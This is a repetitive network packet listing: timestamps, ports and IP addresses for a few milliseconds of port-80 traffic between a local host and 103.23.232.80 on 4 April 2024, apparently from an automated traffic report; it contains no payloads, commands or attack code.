Apr 4, 2024 17:49:07.572855949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572894096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572901011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572931051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572933912 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572973967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573009014 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573019981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573033094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573055029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573055029 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573079109 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573092937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573095083 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573126078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573142052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573174000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573209047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573218107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573240995 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573256016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573278904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573298931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573309898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573323011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573333979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573357105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573359966 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573394060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573425055 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573442936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573461056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573472977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573484898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573491096 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573507071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573528051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573529959 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573559046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573570967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573585987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573616028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573618889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573637962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573668003 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573728085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573764086 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573772907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573893070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573929071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.573936939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573961020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573972940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.573997021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574012041 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574026108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574049950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574059010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574080944 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574109077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574121952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574134111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574146032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574162960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574182034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574192047 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574209929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574217081 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574240923 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574244976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574269056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574280977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574300051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574311972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574326038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574326038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574347019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574362993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574371099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574399948 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574407101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574419022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574433088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574444056 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574459076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574471951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574476957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574515104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574520111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574533939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574546099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574563980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574572086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574587107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574609041 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574621916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574635029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574657917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574666023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574692011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574702024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574743032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574752092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574757099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574769974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574774981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574794054 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574795961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574810028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574826956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574830055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574862003 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574863911 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574896097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574912071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574947119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.574949980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.574984074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575009108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575042963 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575069904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575084925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575104952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575134039 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575148106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575160980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575172901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575186014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575192928 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575197935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575218916 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575234890 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575241089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575289011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575313091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575325966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575339079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575357914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575382948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575395107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575396061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575409889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575417042 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575432062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575443983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575458050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575467110 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575480938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575493097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575520039 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575525045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575571060 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575587988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575602055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575613976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575623989 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575647116 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575649023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575661898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575685978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575700045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575702906 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575732946 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575741053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575788975 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575808048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575820923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575855970 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575874090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575887918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575895071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575946093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575958967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.575969934 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.575984955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576004982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576033115 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576035023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576047897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576067924 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576071978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576082945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576102018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576111078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576145887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576149940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576159954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576174021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576176882 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576193094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576198101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576208115 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576211929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576227903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576245070 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576265097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576278925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576291084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576298952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576314926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576330900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576344013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576390028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576412916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576421976 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576445103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576452017 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576474905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576499939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576530933 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576555014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576567888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576581001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576586008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576595068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576602936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576617956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576632977 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576677084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576718092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576780081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576793909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576806068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576823950 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576844931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576848030 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576878071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576905012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.576941013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.576978922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577016115 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577060938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577075005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577097893 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577121973 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577133894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577157974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577168941 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577203989 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577289104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577301979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577322960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577332973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577337980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577358007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577369928 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577380896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577392101 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577404976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577406883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577444077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577469110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577511072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577522993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577543974 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577567101 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577606916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577620029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577632904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577645063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577656984 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577656984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577682018 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577697992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577727079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577759027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577761889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577794075 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577851057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577864885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577884912 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577903032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577915907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577920914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577934980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577945948 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577970982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.577972889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.577990055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578001976 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578018904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578023911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578047037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578053951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578075886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578083038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578146935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578159094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578171968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578181028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578186035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578217983 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578234911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578268051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578294039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578306913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578336954 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578377008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578389883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578402042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578411102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578433037 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578458071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578470945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578483105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578501940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578547001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578562021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578569889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578573942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578588009 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578588963 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578615904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578630924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578643084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578655958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578660011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578685045 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578708887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578721046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578748941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578768969 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578794956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578808069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578857899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578860044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578895092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578933001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578944921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.578965902 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.578990936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579001904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579050064 CEST	80	49730	103.23.232.80	192.168.2.10
